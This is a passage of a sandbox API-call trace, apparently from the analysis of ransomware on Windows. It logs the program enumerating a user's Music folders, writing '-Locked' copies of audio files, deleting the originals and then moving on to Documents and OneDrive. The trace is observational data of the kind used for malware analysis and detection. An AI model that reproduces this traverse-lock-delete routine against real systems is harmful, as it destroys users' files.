dwReserved1=0x0, cFileName="D3Q e1suI.m4a", cAlternateFileName="D3QE1S~1.M4A")) returned 1 [0303.189] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aedc4 | out: lpFindFileData=0x1aedc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb946ab80, ftCreationTime.dwHighDateTime=0x1d7e079, ftLastAccessTime.dwLowDateTime=0xb57b2960, ftLastAccessTime.dwHighDateTime=0x1d7e4ff, ftLastWriteTime.dwLowDateTime=0xb57b2960, ftLastWriteTime.dwHighDateTime=0x1d7e4ff, nFileSizeHigh=0x0, nFileSizeLow=0x11624, dwReserved0=0x0, dwReserved1=0x0, cFileName="enT 3CCOSpQ2.mp3", cAlternateFileName="ENT3CC~1.MP3")) returned 1 [0303.189] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aedc4 | out: lpFindFileData=0x1aedc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15086610, ftCreationTime.dwHighDateTime=0x1d7e297, ftLastAccessTime.dwLowDateTime=0x2da57db0, ftLastAccessTime.dwHighDateTime=0x1d7e43c, ftLastWriteTime.dwLowDateTime=0x2da57db0, ftLastWriteTime.dwHighDateTime=0x1d7e43c, nFileSizeHigh=0x0, nFileSizeLow=0x12c12, dwReserved0=0x0, dwReserved1=0x0, cFileName="F4vRoPo.wav", cAlternateFileName="")) returned 1 [0303.189] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aedc4 | out: lpFindFileData=0x1aedc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0726ba0, ftCreationTime.dwHighDateTime=0x1d7d9ae, ftLastAccessTime.dwLowDateTime=0x39734fa0, ftLastAccessTime.dwHighDateTime=0x1d7e4b9, ftLastWriteTime.dwLowDateTime=0x39734fa0, ftLastWriteTime.dwHighDateTime=0x1d7e4b9, nFileSizeHigh=0x0, nFileSizeLow=0xd9dd, dwReserved0=0x0, dwReserved1=0x0, cFileName="jvz2tud.wav", cAlternateFileName="")) returned 1 [0303.190] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aedc4 | out: lpFindFileData=0x1aedc4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0303.190] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0303.192] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af04c) returned 1 [0303.192] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af058) returned 1 [0303.192] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af08c) returned 1 [0303.192] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx", nBufferLength=0x105, lpBuffer=0x1aeb94, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx", lpFilePart=0x0) returned 0x2a [0303.192] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\", nBufferLength=0x105, lpBuffer=0x1aeb68, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\", lpFilePart=0x0) returned 0x2b [0303.192] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\*", lpFindFileData=0x1aedb4 | out: lpFindFileData=0x1aedb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa134ae10, ftCreationTime.dwHighDateTime=0x1d7df9e, ftLastAccessTime.dwLowDateTime=0x14230c60, ftLastAccessTime.dwHighDateTime=0x1d7e219, ftLastWriteTime.dwLowDateTime=0x14230c60, ftLastWriteTime.dwHighDateTime=0x1d7e219, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0303.193] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aedc4 | out: lpFindFileData=0x1aedc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa134ae10, ftCreationTime.dwHighDateTime=0x1d7df9e, ftLastAccessTime.dwLowDateTime=0x14230c60, ftLastAccessTime.dwHighDateTime=0x1d7e219, ftLastWriteTime.dwLowDateTime=0x14230c60, ftLastWriteTime.dwHighDateTime=0x1d7e219, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0303.193] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aedc4 | out: lpFindFileData=0x1aedc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1956800, ftCreationTime.dwHighDateTime=0x1d7e397, ftLastAccessTime.dwLowDateTime=0x9fb39f40, ftLastAccessTime.dwHighDateTime=0x1d7e473, ftLastWriteTime.dwLowDateTime=0x9fb39f40, ftLastWriteTime.dwHighDateTime=0x1d7e473, nFileSizeHigh=0x0, nFileSizeLow=0x17f2c, dwReserved0=0x0, dwReserved1=0x0, cFileName="D3Q e1suI.m4a", cAlternateFileName="D3QE1S~1.M4A")) returned 1 [0303.193] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aedc4 | out: lpFindFileData=0x1aedc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb946ab80, ftCreationTime.dwHighDateTime=0x1d7e079, ftLastAccessTime.dwLowDateTime=0xb57b2960, ftLastAccessTime.dwHighDateTime=0x1d7e4ff, ftLastWriteTime.dwLowDateTime=0xb57b2960, ftLastWriteTime.dwHighDateTime=0x1d7e4ff, nFileSizeHigh=0x0, nFileSizeLow=0x11624, dwReserved0=0x0, dwReserved1=0x0, cFileName="enT 3CCOSpQ2.mp3", cAlternateFileName="ENT3CC~1.MP3")) returned 1 [0303.195] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aedc4 | out: lpFindFileData=0x1aedc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15086610, ftCreationTime.dwHighDateTime=0x1d7e297, ftLastAccessTime.dwLowDateTime=0x2da57db0, ftLastAccessTime.dwHighDateTime=0x1d7e43c, ftLastWriteTime.dwLowDateTime=0x2da57db0, ftLastWriteTime.dwHighDateTime=0x1d7e43c, nFileSizeHigh=0x0, nFileSizeLow=0x12c12, dwReserved0=0x0, dwReserved1=0x0, cFileName="F4vRoPo.wav", cAlternateFileName="")) returned 1 [0303.195] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aedc4 | out: lpFindFileData=0x1aedc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0726ba0, ftCreationTime.dwHighDateTime=0x1d7d9ae, ftLastAccessTime.dwLowDateTime=0x39734fa0, ftLastAccessTime.dwHighDateTime=0x1d7e4b9, ftLastWriteTime.dwLowDateTime=0x39734fa0, ftLastWriteTime.dwHighDateTime=0x1d7e4b9, nFileSizeHigh=0x0, nFileSizeLow=0xd9dd, dwReserved0=0x0, dwReserved1=0x0, cFileName="jvz2tud.wav", cAlternateFileName="")) returned 1 [0303.196] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aedc4 | out: lpFindFileData=0x1aedc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0726ba0, ftCreationTime.dwHighDateTime=0x1d7d9ae, ftLastAccessTime.dwLowDateTime=0x39734fa0, ftLastAccessTime.dwHighDateTime=0x1d7e4b9, ftLastWriteTime.dwLowDateTime=0x39734fa0, ftLastWriteTime.dwHighDateTime=0x1d7e4b9, nFileSizeHigh=0x0, nFileSizeLow=0xd9dd, dwReserved0=0x0, dwReserved1=0x0, cFileName="jvz2tud.wav", cAlternateFileName="")) returned 0 [0303.196] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0303.196] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af04c) returned 1 [0303.196] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af058) returned 1 [0303.196] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\D3Q e1suI.m4a-Locked", nBufferLength=0x105, lpBuffer=0x1aea44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\D3Q e1suI.m4a-Locked", lpFilePart=0x0) returned 0x3f [0303.196] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aef38) returned 1 [0303.196] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\D3Q e1suI.m4a-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai\\wyj\\2rpx\\d3q e1sui.m4a-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0303.203] GetFileType (hFile=0x49c) returned 0x1 [0303.204] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aef34) returned 1 [0303.204] GetFileType (hFile=0x49c) returned 0x1 [0303.205] CloseHandle (hObject=0x49c) returned 1 [0303.206] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\D3Q e1suI.m4a", nBufferLength=0x105, lpBuffer=0x1aebc4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\D3Q e1suI.m4a", lpFilePart=0x0) returned 0x38 [0303.206] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\D3Q e1suI.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai\\wyj\\2rpx\\d3q e1sui.m4a")) returned 1 [0303.213] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\enT 3CCOSpQ2.mp3-Locked", nBufferLength=0x105, lpBuffer=0x1aea44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\enT 3CCOSpQ2.mp3-Locked", lpFilePart=0x0) returned 0x42 [0303.213] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aef38) returned 1 [0303.213] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\enT 3CCOSpQ2.mp3-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai\\wyj\\2rpx\\ent 3ccospq2.mp3-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0303.214] GetFileType (hFile=0x49c) returned 0x1 [0303.214] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aef34) returned 1 [0303.214] GetFileType (hFile=0x49c) returned 0x1 [0303.216] CloseHandle (hObject=0x49c) returned 1 [0303.217] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\enT 3CCOSpQ2.mp3", nBufferLength=0x105, lpBuffer=0x1aebc4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\enT 3CCOSpQ2.mp3", lpFilePart=0x0) returned 0x3b [0303.217] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\enT 3CCOSpQ2.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai\\wyj\\2rpx\\ent 3ccospq2.mp3")) returned 1 [0303.231] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\F4vRoPo.wav-Locked", nBufferLength=0x105, lpBuffer=0x1aea44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\F4vRoPo.wav-Locked", lpFilePart=0x0) returned 0x3d [0303.231] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aef38) returned 1 [0303.231] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\F4vRoPo.wav-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai\\wyj\\2rpx\\f4vropo.wav-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0303.232] GetFileType (hFile=0x49c) returned 0x1 [0303.232] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aef34) returned 1 [0303.232] GetFileType (hFile=0x49c) returned 0x1 [0303.235] CloseHandle (hObject=0x49c) returned 1 [0303.235] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\F4vRoPo.wav", nBufferLength=0x105, lpBuffer=0x1aebc4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\F4vRoPo.wav", lpFilePart=0x0) returned 0x36 [0303.235] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\F4vRoPo.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai\\wyj\\2rpx\\f4vropo.wav")) returned 1 [0303.249] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\jvz2tud.wav-Locked", nBufferLength=0x105, lpBuffer=0x1aea44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\jvz2tud.wav-Locked", lpFilePart=0x0) returned 0x3d [0303.251] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aef38) returned 1 [0303.251] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\jvz2tud.wav-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai\\wyj\\2rpx\\jvz2tud.wav-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0303.251] GetFileType (hFile=0x49c) returned 0x1 [0303.251] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aef34) returned 1 [0303.251] GetFileType (hFile=0x49c) returned 0x1 [0303.256] CloseHandle (hObject=0x49c) returned 1 [0303.257] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\jvz2tud.wav", nBufferLength=0x105, lpBuffer=0x1aebc4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\jvz2tud.wav", lpFilePart=0x0) returned 0x36 [0303.257] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\jvz2tud.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai\\wyj\\2rpx\\jvz2tud.wav")) returned 1 [0303.308] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx", nBufferLength=0x105, lpBuffer=0x1aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx", lpFilePart=0x0) returned 0x2a [0303.308] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af064) returned 1 [0303.309] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai\\wyj\\2rpx"), fInfoLevelId=0x0, lpFileInformation=0x1af0e4 | out: lpFileInformation=0x1af0e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa134ae10, ftCreationTime.dwHighDateTime=0x1d7df9e, ftLastAccessTime.dwLowDateTime=0x352ebfeb, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x352ebfeb, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0303.309] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af060) returned 1 [0303.309] RemoveDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai\\wyj\\2rpx")) returned 0 [0303.310] CoTaskMemAlloc (cb=0x404) returned 0x73f0b8 [0303.310] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x91, dwLanguageId=0x0, lpBuffer=0x73f0b8, nSize=0x200, Arguments=0x0 | out: lpBuffer="The directory is not empty.\r\n") returned 0x1d [0303.310] CoTaskMemFree (pv=0x73f0b8) [0303.312] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ", nBufferLength=0x105, lpBuffer=0x1aec60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ", lpFilePart=0x0) returned 0x25 [0303.312] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0ac) returned 1 [0303.312] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai\\wyj"), fInfoLevelId=0x0, lpFileInformation=0x1af12c | out: lpFileInformation=0x1af12c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe1113c30, ftCreationTime.dwHighDateTime=0x1d7db87, ftLastAccessTime.dwLowDateTime=0x351b37b3, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x351b37b3, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0303.312] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0a8) returned 1 [0303.312] RemoveDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai\\wyj")) returned 0 [0303.313] CoTaskMemAlloc (cb=0x404) returned 0x73f0b8 [0303.313] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x91, dwLanguageId=0x0, lpBuffer=0x73f0b8, nSize=0x200, Arguments=0x0 | out: lpBuffer="The directory is not empty.\r\n") returned 0x1d [0303.313] CoTaskMemFree (pv=0x73f0b8) [0303.315] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai", nBufferLength=0x105, lpBuffer=0x1aeca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai", lpFilePart=0x0) returned 0x21 [0303.315] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0f4) returned 1 [0303.315] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai"), fInfoLevelId=0x0, lpFileInformation=0x1af174 | out: lpFileInformation=0x1af174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xccab0970, ftCreationTime.dwHighDateTime=0x1d7d8cf, ftLastAccessTime.dwLowDateTime=0x35166990, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35166990, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0303.315] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0f0) returned 1 [0303.316] RemoveDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai")) returned 0 [0303.316] CoTaskMemAlloc (cb=0x404) returned 0x73f0b8 [0303.316] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x91, dwLanguageId=0x0, lpBuffer=0x73f0b8, nSize=0x200, Arguments=0x0 | out: lpBuffer="The directory is not empty.\r\n") returned 0x1d [0303.317] CoTaskMemFree (pv=0x73f0b8) [0303.338] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\My Documents\\.", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\My Documents", lpFilePart=0x0) returned 0x22 [0303.338] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0303.338] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\My Documents", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\My Documents", lpFilePart=0x0) returned 0x22 [0303.339] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\My Documents\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\My Documents\\", lpFilePart=0x0) returned 0x23 [0303.339] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\My Documents\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0303.340] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af128) returned 1 [0303.343] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\NetHood\\.", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\NetHood", lpFilePart=0x0) returned 0x1d [0303.343] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0303.343] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\NetHood", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\NetHood", lpFilePart=0x0) returned 0x1d [0303.343] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\NetHood\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\NetHood\\", lpFilePart=0x0) returned 0x1e [0303.343] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\NetHood\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0303.344] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af128) returned 1 [0303.349] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\.", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\OneDrive", lpFilePart=0x0) returned 0x1e [0303.349] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0303.349] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\OneDrive", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\OneDrive", lpFilePart=0x0) returned 0x1e [0303.349] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\", lpFilePart=0x0) returned 0x1f [0303.349] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x84ac775d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x84aeda3c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84aeda3c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0303.350] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x84ac775d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x84aeda3c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84aeda3c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0303.350] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x84aeda3c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x84aeda3c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84aeda3c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x67, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0303.351] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0303.351] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0303.351] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0303.351] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0303.351] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0303.351] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\OneDrive", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\OneDrive", lpFilePart=0x0) returned 0x1e [0303.351] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\", lpFilePart=0x0) returned 0x1f [0303.352] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x84ac775d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x84aeda3c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84aeda3c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 